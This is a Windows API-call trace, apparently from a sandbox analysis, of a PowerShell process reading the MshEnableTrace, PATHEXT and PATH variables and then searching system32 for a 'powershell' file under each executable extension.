	[0355.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.354] CoTaskMemFree (pv=0x1b90d0) 
	[0355.446] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.446] CoTaskMemFree (pv=0x1b90d0) 
	[0355.451] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.451] CoTaskMemFree (pv=0x1b90d0) 
	[0355.593] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.593] CoTaskMemFree (pv=0x1b90d0) 
	[0355.596] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.596] CoTaskMemFree (pv=0x1b90d0) 
	[0355.597] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.597] CoTaskMemFree (pv=0x1b90d0) 
	[0355.600] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.600] CoTaskMemFree (pv=0x1b90d0) 
	[0355.601] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.601] CoTaskMemFree (pv=0x1b90d0) 
	[0355.603] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.603] CoTaskMemFree (pv=0x1b90d0) 
	[0355.605] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.605] CoTaskMemFree (pv=0x1b90d0) 
	[0355.770] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.770] CoTaskMemFree (pv=0x1b90d0) 
	[0355.962] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.962] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0355.962] CoTaskMemFree (pv=0x1b90d0) 
	[0355.965] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.965] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0355.965] CoTaskMemFree (pv=0x1b90d0) 
	[0355.965] CoTaskMemAlloc (cb=0x128) returned 0x1baff0
	[0355.965] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1baff0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0355.965] CoTaskMemFree (pv=0x1baff0) 
	[0355.970] CoTaskMemAlloc (cb=0x20e) returned 0x1b8995e0
	[0355.970] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8995e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0355.970] CoTaskMemFree (pv=0x1b8995e0) 
	[0355.973] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0355.975] SetErrorMode (uMode=0x1) returned 0x1
	[0355.977] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.115] SetErrorMode (uMode=0x1) returned 0x1
	[0356.116] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.116] SetErrorMode (uMode=0x1) returned 0x1
	[0356.116] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.124] SetErrorMode (uMode=0x1) returned 0x1
	[0356.126] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.126] SetErrorMode (uMode=0x1) returned 0x1
	[0356.126] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.134] SetErrorMode (uMode=0x1) returned 0x1
	[0356.136] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.136] SetErrorMode (uMode=0x1) returned 0x1
	[0356.136] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.144] SetErrorMode (uMode=0x1) returned 0x1
	[0356.145] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.146] SetErrorMode (uMode=0x1) returned 0x1
	[0356.146] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.281] SetErrorMode (uMode=0x1) returned 0x1
	[0356.283] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.283] SetErrorMode (uMode=0x1) returned 0x1
	[0356.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.291] SetErrorMode (uMode=0x1) returned 0x1
	[0356.292] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.293] SetErrorMode (uMode=0x1) returned 0x1
	[0356.293] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.301] SetErrorMode (uMode=0x1) returned 0x1
	[0356.302] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.302] SetErrorMode (uMode=0x1) returned 0x1
	[0356.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.311] SetErrorMode (uMode=0x1) returned 0x1
	[0356.312] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.312] SetErrorMode (uMode=0x1) returned 0x1
	[0356.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.320] SetErrorMode (uMode=0x1) returned 0x1
	[0356.321] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.321] SetErrorMode (uMode=0x1) returned 0x1
	[0356.322] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.440] SetErrorMode (uMode=0x1) returned 0x1
	[0356.442] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.442] SetErrorMode (uMode=0x1) returned 0x1
	[0356.442] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.450] SetErrorMode (uMode=0x1) returned 0x1
	[0356.451] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.451] SetErrorMode (uMode=0x1) returned 0x1
	[0356.451] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.459] SetErrorMode (uMode=0x1) returned 0x1
	[0356.461] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.461] SetErrorMode (uMode=0x1) returned 0x1
	[0356.461] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.612] SetErrorMode (uMode=0x1) returned 0x1
	[0356.613] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.613] SetErrorMode (uMode=0x1) returned 0x1
	[0356.613] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.623] SetErrorMode (uMode=0x1) returned 0x1
	[0356.625] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.625] SetErrorMode (uMode=0x1) returned 0x1
	[0356.625] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.633] SetErrorMode (uMode=0x1) returned 0x1
	[0356.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.634] SetErrorMode (uMode=0x1) returned 0x1
	[0356.634] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.635] SetErrorMode (uMode=0x1) returned 0x1
	[0356.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.635] SetErrorMode (uMode=0x1) returned 0x1
	[0356.635] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.635] SetErrorMode (uMode=0x1) returned 0x1
	[0356.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.636] SetErrorMode (uMode=0x1) returned 0x1
	[0356.636] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.636] SetErrorMode (uMode=0x1) returned 0x1
	[0356.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.636] SetErrorMode (uMode=0x1) returned 0x1
	[0356.636] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.636] SetErrorMode (uMode=0x1) returned 0x1
	[0356.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.637] SetErrorMode (uMode=0x1) returned 0x1
	[0356.637] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.637] SetErrorMode (uMode=0x1) returned 0x1
	[0356.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.638] SetErrorMode (uMode=0x1) returned 0x1
	[0356.638] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.638] SetErrorMode (uMode=0x1) returned 0x1
	[0356.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.638] SetErrorMode (uMode=0x1) returned 0x1
	[0356.638] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.638] SetErrorMode (uMode=0x1) returned 0x1
	[0356.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.639] SetErrorMode (uMode=0x1) returned 0x1
	[0356.639] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.639] SetErrorMode (uMode=0x1) returned 0x1
	[0356.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.639] SetErrorMode (uMode=0x1) returned 0x1
